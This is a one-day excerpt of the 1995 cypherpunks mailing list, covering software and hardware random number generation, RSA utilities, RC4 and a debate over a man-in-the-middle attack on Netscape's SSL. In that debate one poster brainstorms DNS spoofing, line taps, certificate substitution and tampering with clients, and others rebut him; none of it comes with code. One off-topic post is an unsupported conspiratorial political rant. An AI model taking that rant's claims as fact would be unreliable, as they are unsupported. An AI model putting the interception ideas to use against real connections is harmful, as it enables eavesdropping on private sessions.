| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |               |






From merriman at arn.net  Sat Sep 30 14:02:23 1995
From: merriman at arn.net (David K. Merriman)
Date: Sat, 30 Sep 95 14:02:23 PDT
Subject: my favorite random-numbers-in-software package (unix)
Message-ID: <199509302103.QAA26651@arnet.arn.net>


At 03:46 PM 9/30/95 -0400, you wrote:

...  ...

>The basic idea is that you exploit randomness in the drift between
>the processor clock and the rate at which interval timer interrupts
>occur.  Such drift occurs even on idle processors.  randbyte() assumes
>that there's at least about .4 bits of "entropy" per interrupt, which is 
>(probably) a safe assumption on modern processors.  Randomness introduced
>by the OS (scheduler, etc.) can add to the overall entropy, but shouldn't
>be relied upon by itself.
>
>An advantage to this approach (using clock skew) is that the randomness
>doesn't depend on external events like user input, network traffic or
>processor load.  That makes it especially attractive for generating keys
>on unattended servers, e.g., for generating Diffie-Hellman exponents.
>Note, however, that very (very) slow and heavily-loaded processors may
>not provide enough cycles to the truerand process between interrupts for
>these assumptions to hold.  Also, all bets are off on processors that use
>a single clock source for both interval timing and CPU clocking.

Even with the exclusion of processors using single-source clocking for
interval and CPU timing, this would *seem* to be somewhat hazardous. Any two
clocking mechanisms that are 'mixed' are going to result in a number of
harmonics, or beat frequencies. While your system - at any given instant -
is quite likely to have a decent amount of randomness in it, I'd hazard a
guess that repetitive use would result in a discernible pattern. Even
something as 'coarse' as an interrupt timer has a finite range that it can
(must) operate in. Even if the CPU oscillator is based on a ceramic
resonator (nowhere near as stable/accurate as a crystal), the clock on it is
going to stay within +/-1% (worst case, for a *really* cheap oscillator) of
frequency, and drift not more than some number of Parts Per Million per
Period. Mixing the innate (relative) accuracy of two oscillators, and the
necessarily limited amount of drift that they're capable of, would seem to
result in an unacceptably low-yield source of 'real' randomness.

Of course, I'm kind of math-impaired when it comes to crypto, so my 20+
years of electronics (hardware) experience may not apply in this case :-)

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148







From jbass at dmsd.com  Sat Sep 30 15:14:10 1995
From: jbass at dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 15:14:10 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9509302213.AA11359@dmsd.com>


Ok, several people have asked:

> Please explain to me how you can break SSL using the above method. I
> don't follow your line of thought. How could my fake www server
> intercept and redirect packets to netscape.com short of hacking a DNS
> server?

client ->       filter                          Client sends packet with K(c)
                filter ->       Server          filter forwards packet with K(f)                filter       <- Server          Server sends encrypts with K(f)
client       <- filter                          filter re-encrypts with K(c)

As the protocol progresses the filter also uses the master key,
and follows the renegotiation as the master key expires.


The existance of a working filter is enough to invalidate the security in
NetScape's claims.


hacking a DMS server is one way, spoofing a DNS reply to named is easier,
simply packaging the filter into a router/bridge close to the server
is more effective ... even if hacking the incoming phoneline/T1 line
to the server and inserting a very transparent bridge AKA a phone tap.

There is enough dollars to make the risks ... :)

John

BTW ... how do I join for these two list? Where are they archived to
catchup with past traffic?






From gmixo at alpha.c2.org  Sat Sep 30 15:28:31 1995
From: gmixo at alpha.c2.org (gmixo)
Date: Sat, 30 Sep 95 15:28:31 PDT
Subject: Auto-signing
Message-ID: <199509302209.PAA03217@infinity.c2.org>


would someone please send me information about any autosigning services.... like the gratis auto-signing.... and others like it.... thanks

gmixo






From jbass at dmsd.com  Sat Sep 30 15:40:11 1995
From: jbass at dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 15:40:11 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9509302239.AA11407@dmsd.com>


>   jbass at dmsd.com writes:
>    > client ->       filter                          Client sends packet with K(c)
>                 filter ->       Server          filter forwards packet with K(f)                filter       <- Server          Server sends encrypts with K(f)
>    > client       <- filter                          filter re-encrypts with K(c)
>    >
>    > As the protocol progresses the filter also uses the master key,
>    > and follows the renegotiation as the master key expires.
> 
> Yeah, but in order for this to work, the fake server needs to know
> netscape.com's private (secret) key, no?
> 
> -jon

No ... the public part of any server private key is held by the filter
and not returned to the client. The client only encrypts with public
keys provided by the filter. The Server only encrypts with public keys
provided by the filter. The filter has cleartext of the entire session.

John






From jbass at dmsd.com  Sat Sep 30 15:50:19 1995
From: jbass at dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 15:50:19 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9509302250.AA11430@dmsd.com>



Ok ... one more time ... the filter has to replace the client/server
keys in the packet stream with it's own ...

John






From mab at crypto.com  Sat Sep 30 15:50:27 1995
From: mab at crypto.com (Matt Blaze)
Date: Sat, 30 Sep 95 15:50:27 PDT
Subject: my favorite random-numbers-in-software package (unix)
In-Reply-To: <199509302103.QAA26651@arnet.arn.net>
Message-ID: <199509302301.TAA16936@crypto.com>


David Merriman writes:
> 
> Even with the exclusion of processors using single-source clocking for
> interval and CPU timing, this would *seem* to be somewhat hazardous. Any two
> clocking mechanisms that are 'mixed' are going to result in a number of
> harmonics, or beat frequencies. While your system - at any given instant -
> is quite likely to have a decent amount of randomness in it, I'd hazard a
> guess that repetitive use would result in a discernible pattern. Even
> something as 'coarse' as an interrupt timer has a finite range that it can
> (must) operate in. Even if the CPU oscillator is based on a ceramic
> resonator (nowhere near as stable/accurate as a crystal), the clock on it is
> going to stay within +/-1% (worst case, for a *really* cheap oscillator) of
> frequency, and drift not more than some number of Parts Per Million per
> Period. Mixing the innate (relative) accuracy of two oscillators, and the
> necessarily limited amount of drift that they're capable of, would seem to
> result in an unacceptably low-yield source of 'real' randomness.

I'm the first to agree that, in the absence of some good analysis of
the exact platform on which it is run, the clock-skew approach is built
on a very weak foundation.  But informal (and completely ad hoc)
analysis suggests that it might be more promising than you'd first
expect.  While the drift between the two clocks is likely only very small,
we're also not asking for very much; we need less than one bit
worth of uncertainty in an accumulator that burns processor cycles until
some (smaller) number of clock intervals have occurred.  (The OS might
also not give you all those cycles, adding to the uncertainty, although
you can't really count on this in the case of high-priority processes or
unloaded machines).

I (and a few others) have run some tests on this on a couple of (bare)
processors in an effort to find artificats of the clock periods in the
low-order bits of the counter, with no success.  This, of course, hardly
constitutes a "proof".

I'd love to see some good analysis of this technique, particularly with
an eye toward quantifying the quality and bandwidth of the output and
finding better parameters for the minimum interval rate, etc.

-matt

PS there are other "magic" techniques for getting randomness without special
hardware that are proposed from time to time but that never really undergo
enough analysis for my taste.  For example, at CRYPTO '94 (or maybe '93)
there was an interesting proposal to use software to measure the air flow
inside the disk drive.





From ericm at lne.com  Sat Sep 30 16:22:50 1995
From: ericm at lne.com (Eric Murray)
Date: Sat, 30 Sep 95 16:22:50 PDT
Subject: NetScape's dependence upon RSA down for the count!
In-Reply-To: <9509302239.AA11407@dmsd.com>
Message-ID: <199509302336.QAA23456@slack.lne.com>


 
> >   jbass at dmsd.com writes:
> >    > client ->       filter                          Client sends packet with K(c)
> >                 filter ->       Server          filter forwards packet with K(f)                filter       <- Server          Server sends encrypts with K(f)
> >    > client       <- filter                          filter re-encrypts with K(c)
> >    >
> >    > As the protocol progresses the filter also uses the master key,
> >    > and follows the renegotiation as the master key expires.
> > 
> > Yeah, but in order for this to work, the fake server needs to know
> > netscape.com's private (secret) key, no?
> > 
> > -jon
> 
> No ... the public part of any server private key is held by the filter
> and not returned to the client. The client only encrypts with public
> keys provided by the filter. The Server only encrypts with public keys
> provided by the filter. The filter has cleartext of the entire session.

What you have described is the classic 'man in the middle' attack.
Netscape claims that SSL V.3 is immune to the MITM attack in
appendix D.4 of the SSL V.3 spec. 

You will need to get the 'filter' (MITM) key signed by Verisign.
Or hack Verisign's server-key-signing key.


BTW your 'offer' is silly- this is not a trivial amount of work, and you
would not deserve any credit for coming up with so ordinary an
attack.  Write the code yourself, or pay the market rate for it.

-- 
Eric Murray  ericm at lne.com  ericm at motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From perry at piermont.com  Sat Sep 30 16:41:12 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 30 Sep 95 16:41:12 PDT
Subject: Simple Hardware RNG Idea
In-Reply-To: 
Message-ID: <199509302340.TAA25393@frankenstein.piermont.com>



Timothy C. May writes:
> 2. Incorporating Am-241 or other alpha emitters in microcurie levels would
> require licensing, regulatory oversight, etc., etc. Don't count on it.
> 
> 3. Data rates are fairly low. Anything that "clicks" at high rates (> 1K
> counts per second) would be too radioactive to ship.
> 
> 4. Zener diodes and other random noise sources are cheaper to build, more
> consistent in output, and easier to integrate into actual products.

However, radiation detection devices are far easier to assure correct
operation. You can buy pre-built radiation counters with RS-232
interfaces, so its really just a question in many cases of buying them
and small radation sources, the latter of which is available in most
scientific supply catalogs. Unlike other devices, its very hard for
outsiders to tamper with radation sources to make them produce
specially skewed numbers....

Perry





From ericm at lne.com  Sat Sep 30 17:11:58 1995
From: ericm at lne.com (Eric Murray)
Date: Sat, 30 Sep 95 17:11:58 PDT
Subject: NetScape's dependence upon RSA down for the count!
In-Reply-To: <9509302250.AA11430@dmsd.com>
Message-ID: <199510010025.RAA23630@slack.lne.com>


> 
> 
> Ok ... one more time ... the filter has to replace the client/server
> keys in the packet stream with it's own ...


Where in SSL are these 'client/server keys' being sent?
A pointer to the page of the V3 spec where these keys are 
described will do.


-- 
Eric Murray  ericm at lne.com  ericm at motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From Don.Stephenson at Eng.Sun.COM  Sat Sep 30 17:15:57 1995
From: Don.Stephenson at Eng.Sun.COM (Don Stephenson)
Date: Sat, 30 Sep 95 17:15:57 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010003.AA08494@icenine.Eng.Sun.COM>



I haven't read the SSL spec for a while but my understanding was that 
the server passed it's public key to the client via a certificate 
signed by a mutually trusted certificate authority (i.e., Verisign).

How would the filter be able to forge such a certificate ?

- Don



> From jbass at dmsd.com Sat Sep 30 16:47:11 1995
> Date: Sat, 30 Sep 95 16:39:57 -0600
> From: jbass at dmsd.com (John L. Bass)
> To: www-security at ns2.rutgers.edu, cypherpunks at toad.com
> Subject: Re: NetScape's dependence upon RSA down for the count!
> 
> >   jbass at dmsd.com writes:
> >    > client ->       filter                          Client sends packet with K(c)
> >                 filter ->       Server          filter forwards packet with K(f)                filter       <- Server          Server sends encrypts with K(f)
> >    > client       <- filter                          filter re-encrypts with K(c)
> >    >
> >    > As the protocol progresses the filter also uses the master key,
> >    > and follows the renegotiation as the master key expires.
> > 
> > Yeah, but in order for this to work, the fake server needs to know
> > netscape.com's private (secret) key, no?
> > 
> > -jon
> 
> No ... the public part of any server private key is held by the filter
> and not returned to the client. The client only encrypts with public
> keys provided by the filter. The Server only encrypts with public keys
> provided by the filter. The filter has cleartext of the entire session.
> 
> John
> 
> 





From Don.Stephenson at Eng.Sun.COM  Sat Sep 30 17:33:59 1995
From: Don.Stephenson at Eng.Sun.COM (Don Stephenson)
Date: Sat, 30 Sep 95 17:33:59 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010024.AA08498@icenine.Eng.Sun.COM>



Yes, but the certificate that contains the public key of the server 
is digital signed by the certificate authority (CA).

To create such a certificate requires the secret key of the CA.

The public key of the CA is contained in the client software, which 
uses it to verify the validity of the server certificate.

- Don 


> From jbass at dmsd.com Sat Sep 30 17:15:36 1995
> Date: Sat, 30 Sep 95 16:50:05 -0600
> From: jbass at dmsd.com (John L. Bass)
> To: www-security at ns2.rutgers.edu, cypherpunks at toad.com
> Subject: Re: NetScape's dependence upon RSA down for the count!
> 
> 
> Ok ... one more time ... the filter has to replace the client/server
> keys in the packet stream with it's own ...
> 
> John
> 
> 





From anon-remailer at utopia.hacktic.nl  Sat Sep 30 18:30:13 1995
From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request)
Date: Sat, 30 Sep 95 18:30:13 PDT
Subject: Auto-signing
In-Reply-To: <199509302209.PAA03217@infinity.c2.org>
Message-ID: <199510010130.CAA07315@utopia.hacktic.nl>


gmixo  wrote:

> would someone please send me information about any autosigning
> services.... like the gratis auto-signing.... and others like it....
> thanks

Look at http://www.hks.net/

I don't know of any others. although the moderator of comp.os.linux.announce
has a policy of PGP-signing all approved posts as a method of combatting
spam.





From remailer at flame.alias.net  Sat Sep 30 18:31:10 1995
From: remailer at flame.alias.net (Flame Remailer)
Date: Sat, 30 Sep 95 18:31:10 PDT
Subject: Linux RSA Library (fwd)
Message-ID: <199510010131.CAA07331@utopia.hacktic.nl>


From: Jim Kinder 
Newsgroups: comp.os.linux.announce
Subject: RSA Encryption Utilities.
Followup-To: comp.os.linux.development.apps
Date: Sat, 30 Sep 95 14:28:37 GMT
Organization: Network Application Technology
Lines: 39
Approved: linux-announce at news.ornl.gov (Lars Wirzenius)
Message-ID: 
NNTP-Posting-Host: kruuna.helsinki.fi
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

-----BEGIN PGP SIGNED MESSAGE-----

I have a set of Encryption Utilities for Linux

cyrpt - Unix sytle crypt(1) command using homebrew alogorithm

rcrypt - Beter version of crypt

primegen - Unlimited size prime number generator

rsacrypt - Unlimited key size RSA encryption system.

rsadecrypt - Decryption for rsacrypt

genkey - Generate RSA keys.

This package is similar to pgp, but the algorithms are more transparent, and
the key size is unlimited.  It uses a C++.

I wrote all of this code myself and I will give it away to whomever wants it.

I am planning on using it to write an encrypted mail system.

If you want this code I will e-mail it to you in uuencode format.


- --
Send comp.os.linux.announce submissions to: linux-announce at news.ornl.gov
PLEASE remember a short description of the software.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMG1OyIQRll5MupLRAQFHeAP9GO7IJSu0eqWbnVKWUSk/RQZU+5jwRuEv
U1TzLaRZO4F5GXG3E4awx0RonuDtOeOZ/wCls7MONlk3JP0YigpxY23jA3pbfUhx
5JdbVYrbdNm5yi18GlRgsGdhkzIyTXPB7s/F2tUAxC80fxC85LM7O1RFINRrgUrc
QDIOmJNZVMM=
=Q9w9
-----END PGP SIGNATURE-----







From ses at tipper.oit.unc.edu  Sat Sep 30 19:20:06 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Sat, 30 Sep 95 19:20:06 PDT
Subject: NetScape's dependence upon RSA down for the count!
In-Reply-To: <199509302336.QAA23456@slack.lne.com>
Message-ID: 


On Sat, 30 Sep 1995, Eric Murray wrote:

> What you have described is the classic 'man in the middle' attack.
> Netscape claims that SSL V.3 is immune to the MITM attack in
> appendix D.4 of the SSL V.3 spec. 

I think you're misunderstanding the claim somewhat - what D.4 does is warn 
implementors that they should perform  some means of associating 
hostnames and certificates. You can't just use SSL out of the box without 
doing anything in the application to check. 

My currently recommended approach is to enforce the verisign requirement 
that all valid hostnames for the server be included in the certificate as 
CN values. This allows the check to be made below the application layer. 
Unfortunately a lot of currently issued certificates are non-compliant 
(even Verisign and netscape :-); any fully automated implementation needs 
a static table of hostnames aliases- interactive applications can 
display certificates for manual review.

> 
> You will need to get the 'filter' (MITM) key signed by Verisign.
> Or hack Verisign's server-key-signing key.

This is not really much protection. Getting hold of any key is much 
easier than getting a specific key, and don't forget there are a number 
of vulnerable keys floating around until their expiration dates pass. 

This attack has been known about for a long time, and is too obvious to 
be really interesting; I implemented a demonstration of the attack as 
part of developing a protection. If anybody is interested I can mail them my
report. 

The variant of the attack I implemented is useless for anything but 
demonstration purposes, or I'd ask sameer for a T-shirt. The external fix 
is a bit more useful, but there doesn't seem to be a patchnetscape alias :-)

Simon






From rsalz at osf.org  Sat Sep 30 19:44:08 1995
From: rsalz at osf.org (Rich Salz)
Date: Sat, 30 Sep 95 19:44:08 PDT
Subject: "Notes" to be Eclipsed by "Netscape"
Message-ID: <9510010242.AA06388@sulphur.osf.org>


> I've seen Notes running ...
> but my access to it was only marginal.
> But, knowing the software, it wouldn't surprise me if there were 
> some serious bugs in the security code.

Er, sounds to me like you're leaping to some conclusions...

At any rate, one of the designers of Notes's security was Charlie Kaufman
(formerly of Digital, recent author of a security book mentioned here) and
he is No Slouch.
	/r$






From jcaldwel at iquest.net  Sat Sep 30 19:57:30 1995
From: jcaldwel at iquest.net (James Caldwell)
Date: Sat, 30 Sep 95 19:57:30 PDT
Subject: Operation Stop The Aliens
Message-ID: 



To whom it may concern:



This fellows proposed  actions are those of a blind fool who cannot
see the forest for the trees. A such he is nothing more than part of
the problem.

He sees foreign immigrants, legal or illegal, as being a problem.
The problem he is seeing is not any problem created by the immigrants
who are looking for something better, but one created for the very
purpose of distracting such fools as him from the underlying problems
his state this Nation faces. 

He has bought the lie spewed by the talking heads and other
psycological operations that have told him to think the 'illegals'
are causing some sort of problem.

Prop 187 and such proposals are nothing more than a method to have 
implemented systems and plans, not to correct the alledged problem, 
but to implement an underlying plan that was the desired goal from 
the start; namely a national ID and tracking system.

This is a typical tactic, race against race, religion against
religion, etc. all to divide us into small, blind, ineffective,
bickering groups who have little voice and no cohesive political
power.

If his actions do not accelerate what is already occuring then the 
real enemy is alseep, as it is a wonderful opportunity for further 
psycological operations that will benefit them in numerous ways.






From skaplin at skypoint.com  Sat Sep 30 21:18:11 1995
From: skaplin at skypoint.com (skaplin at skypoint.com)
Date: Sat, 30 Sep 95 21:18:11 PDT
Subject: Digests No Longer Available
Message-ID: 


Due to some personal issues, I am being forced to cut back my net 
involvement. Cypherpunks and its digests are a causality of this. 
Effective immediately I will no longer be keeping digests of the 
list.  Hopefully in a few months I'll be back.

Sam





From jbass at dmsd.com  Sat Sep 30 21:46:56 1995
From: jbass at dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 21:46:56 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010446.AA11983@dmsd.com>


> BTW your 'offer' is silly- this is not a trivial amount of work, and you
> would not deserve any credit for coming up with so ordinary an
> attack.  Write the code yourself, or pay the market rate for it.
> -- 
> Eric Murray  ericm at lne.com  ericm at motorcycle.com  http://www.lne.com/ericm

So is the Tee Shirt offer, and so is cracking the RSA public key
algorithm ... the point is that at least two teams did it.

My offer is trival in $$'s I agree, but the challenge I offer is to
focus on the weaknesses of SSL rather than it's strengths (large keys).
I suspect this is easier than most people think, so maybe I should
offer a Tee Shirt instead?

I suspect the certificates can be attacked in one of several ways.

The most likely is that the filter can use the servers certificate and fake,
forge, or simply subsititue a valid one in the filters name for the client.
This might mean that the filter has to become a trusted server as well.
I don't see any problems with the filter playing client to the server
given the SSL protocol.

Another is since the clients are often distributed
over the net, that another filter is installed recognize clients and alter
them on the fly to avoid the client/filter problem in the future.

Another tack is based on getting very close to the server (in a bridge or
router in the direct path to the server) in which the filter might acutally
be able to get the get valid certificates signed in the servers name, while
eating the real requests.

The reality is that all three parties are strangers, and I have had doubts
about the very nature of certificates & public key in this case.

John Bass
DMS Design






From rsalz at osf.org  Sat Sep 30 22:34:11 1995
From: rsalz at osf.org (Rich Salz)
Date: Sat, 30 Sep 95 22:34:11 PDT
Subject: T-shirt on French TV
Message-ID: <9510010533.AA06669@sulphur.osf.org>


Timing is everything...

I happened to be flipping the channels while on the TV in my hotel room
Friday evening between 8 and 8:30 when I saw someone wearing the UK crypto
shirt on a talk show on French TV3.  I know no French.  A guy was standing
up wearing the shirt, turning around, holding it out for the camera, etc.
Someone sitting down was talking about it to the moderator -- I heard
words like cryptographique a few times.  When the speaker pointed to the
"may be illegal in France" part, the guy took the shirt off and the crowd
laughed.

The segment was about 10 minutes.
	/r$






From mixmaster at vishnu.alias.net  Sat Sep 30 22:49:38 1995
From: mixmaster at vishnu.alias.net (Mr. Boffo)
Date: Sat, 30 Sep 95 22:49:38 PDT
Subject: RSA's comments on RC4 weak keys
In-Reply-To: <9508298124.AA812423895@snail.rsa.com>
Message-ID: <199510010537.AAA09694@alpha.jpunix.com>


Robert W. Baldwin  wrote:

> Here is our response to the excellent work that Andrew Roos has been
> doing on RC4.  I am glad that people are looking at RC4 critically.

Oh really?  A year ago you didn't want anyone looking at RC4 at all!

But since you now seem to be for open review, we'd be happy to
cryptanalyze RC2 for ya also.  :)





From Don.Stephenson at Eng.Sun.COM  Sat Sep 30 23:16:29 1995
From: Don.Stephenson at Eng.Sun.COM (Don Stephenson)
Date: Sat, 30 Sep 95 23:16:29 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010614.AA08538@icenine.Eng.Sun.COM>



> From ses at tipper.oit.unc.edu Sat Sep 30 20:43:51 1995

> My currently recommended approach is to enforce the verisign requirement 
> that all valid hostnames for the server be included in the certificate as 
> CN values. This allows the check to be made below the application layer. 
> Unfortunately a lot of currently issued certificates are non-compliant 
> (even Verisign and netscape :-); any fully automated implementation needs 
> a static table of hostnames aliases- interactive applications can 
> display certificates for manual review.

I don't think binding hostnames to certificates helps much because 
both hostnames and IP addresses can be spoofed and DNS servers can be 
subverted.  The important thing is the binding to the "service" name or 
definition (e.g. InterState online banking service).


> This is not really much protection. Getting hold of any key is much 
> easier than getting a specific key, and don't forget there are a number 
> of vulnerable keys floating around until their expiration dates pass. 

Well of course, if the secret key of the server (or worse yet, certificate 
authority) is compromised, all bets are off.  That's true of just about any 
protocol you can dream up.

Are you just referring to the problem of accurate and up to date certificate 
revocation lists (CRL) being available ?

If so, you're right, this is a very difficult problem to solve without 
having a truly reliable and pervasive key-distribution & CRL system 
deployed throughout the world.

- Don








From rsalz at osf.org  Sat Sep 30 23:17:30 1995
From: rsalz at osf.org (Rich Salz)
Date: Sat, 30 Sep 95 23:17:30 PDT
Subject: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <9510010616.AA06860@sulphur.osf.org>


One of the most interesting things SAIC does is run places that
monitor seismic events.  S.E.'s, by the way, are things that might be
earthquakes but could be A-bomb tests.

SAIC ran the Center for Seismic Studies in Arlington, VA.  Rick Adams,
co-founder of UUnet, made one of their machines, seismo, the UUCP hub of the
world for a couple of years.
	/r$